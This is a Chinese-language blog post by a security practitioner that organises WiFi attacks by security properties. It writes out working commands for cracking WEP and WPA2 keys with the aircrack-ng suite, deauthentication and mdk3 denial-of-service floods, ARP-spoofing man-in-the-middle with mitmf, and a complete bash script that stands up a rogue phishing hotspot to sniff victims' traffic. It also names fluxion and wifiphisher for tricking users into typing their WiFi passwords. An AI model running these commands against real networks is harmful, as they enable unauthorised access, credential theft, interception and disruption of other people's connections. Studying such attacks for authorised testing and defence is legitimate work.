從事信息安全相關工作5年了,雖然主要工作是安全產品售前、安全服務等方向,但既然選擇了安全,想必都是有點黑客情節的,因此也前前后后雜七雜八的學了點東西。最近在研究無線(主要是WIFI)安全,相關書籍看了幾本、網上文章也讀過幾篇,基本上都是告訴我們怎么破解WEP、WPA等,怎么偽造AP,怎么釣魚等等,感覺挺雜亂的。當我們面對一個無線系統或者一個WEB系統,我們究竟應該從哪些方面去攻擊呢,換言之——攻擊思路是什么?
記得剛畢業進入安全行業時,經常會碰到信息系統安全三要素CIA(完整性、保密性、可用性),或者五要素、六要素的,好枯燥呀,除了裝裝專業,貌似一點用處也沒有,直到最近研究無線安全時,忽然意識到安全要素不就是攻擊思路嗎??!!其實無線攻擊、WEB攻擊的各種方法都可以從這些要素中找到方向。下面以無線攻擊為例:
1.保密性
我們攻擊WIFI的第一個思路就是從保密性出發,我們希望從無線系統中獲取用戶的明文數據。首先,我們知道WIFI的的認證加密主要有以下四種方式:OPEN(無加密)、WEP(RC4)、WPA(TKIP)、WPA2(CCMP)。
OPEN的WIFI沒有采取認證加密措施,任意用戶均可鏈接WIFI,用戶數據在BSS(基本服務集)中明文傳輸,惡意用戶沒有任何門檻就可連接,然后通過中間人攻擊即可獲取用戶的數據(SSL、SSH等需要其他工具)。如下圖所示:
WEP、WPA、WPA2認證加密模式的WIFI需要破解獲取密碼,然后通過中間人或直接嗅探的方式獲取用戶明文數據。步驟就不詳述了,WEP抓取IVS包,WPA/WPA2抓取handshake包。
WEP大概如下:
airodump-ng --ivs -w /workspace/sniff/airmon --bssid AP的MAC -c AP的chanle wlan1mon #捕獲ivs數據包
aireplay-ng -3 -b 目標AP的MAC -h 某一個連接該AP的station的MAC wlan1mon #發送ARP包獲取加速獲取ivs
aircrack-ng /workspace/sniff/airmon02.ivs
WPA/WPA2大概如下:
airodump-ng -w /workspace/sniff/airmon-wpa2 --bssid 目標AP的MAC -c AP所在chanle wlan1mon #嗅探無線數據,抓取handshake包
aireplay-ng -0 5 -a 目標AP的MAC -c 某一連接AP的station的MAC wlan1mon #發送deauth包,更快的獲取handshake
aircrack-ng -w 你的字典文件 /workspace/sniff/airmon-wpa2.cap #破解wpa2密碼
密碼破解成功后即可連接AP,通過中間人的方式獲取用戶明文數據,或者直接用wireshark抓取加密包,然后通過airdecap-ng工具解密,然后用wireshark讀取已經解密的數據包。
破解WPA、WPA2不一定成功,取決於你字典是否強大,此時我們可以想辦法誘騙用戶主動輸入WIFI密碼,比如我們創建一個和目標AP具有同樣ESSID的軟AP,用戶可以連接上,單在瀏覽網頁時會彈出一個虛假的認證頁面,告訴用戶必須輸入WIFI的密碼,用戶只要輸入密碼我們即可獲取。可以利用fluxion、wifiphisher等工具實現。
wifiphisher將用戶輸入的密碼當做WIFI的密碼,但此密碼並沒有去驗證,如果用戶輸入錯誤,也會提示出該密碼。
而fluxion會將用戶輸入的密碼與handshake校驗,成功方認為獲取到密碼。
2.可用性
通過使目標用戶無法使用WIFI來破壞無線系統的可用性,通常通過DOS攻擊來實現,比如發送大量的deauth包來迫使用戶station與AP解除認證、連接。
aireplay -0 100 -a 目標AP的MAC -c攻擊的station的MAC wlan1mon #發送大量的deauth包,迫使目標station無法連接AP
mdk3 wlan1mon a -a 攻擊AP的MAC #mdk3可以偽造大量的station與AP連接,從而耗盡AP的資源造成DOS攻擊
3.真實性
(1)惡意用戶進入無線系統后,可通過中間人攻擊獲取或修改用戶數據。
ARP欺騙或DNS欺騙,ettercap工具非常方便。下面采用mitmf工具通過ARP欺騙將目標瀏覽網頁中的所有圖片上下顛倒。
mitmf -i wlan0 --spoof --arp --gateway 192.168.2.1 --target 192.168.2.1 --upsidedownternet
通過driftnet工具抓取目標瀏覽網頁時的圖片
driftnet -i wlan0
當然還可以利用中間人攻擊做很多事情,比如獲取cookie,嵌入js,結合beef進一步攻擊等等。。。
(2)偽造AP進行釣魚攻擊
airbase -ng -e airmon wlan1mon #創建釣魚熱點
然后通過下面的腳本開啟dhcp服務器(必須先安裝isc-dhcp-server),開啟路由,開啟系統轉發,開啟防火牆nat等。
1 #!/bin/bash 2 3 echo '配置釣魚熱點...' 4 5 service isc-dhcp-server stop 6 rm /var/lib/dhcp/dhcpd.leases 7 touch /var/lib/dhcp/dhcpd.leases 8 9 ifconfig at0 up 10 ifconfig at0 10.0.0.1 netmask 255.255.255.0 11 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 12 sysctl net.ipv4.ip_forward=1 13 14 dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 15 echo '等待啟動dhcp服務器...' 16 sleep 5 17 service isc-dhcp-server start 18 19 iptables -F 20 iptables -t nat -F 21 22 #iptables -P FORWARD ACCEPT 23 iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
此時用戶可以不用密碼即可連接airmon熱點,並可以上網,但此時可以通過嗅探at0網卡獲取用戶數據。
4.完整性
篡改用戶數據,在WIFI攻擊這塊貌似用處不大。
5.不可抵賴性
忽略。
部分內容還是不夠准確,本文主要提供攻擊思路,還有些內容待后續完善吧。。。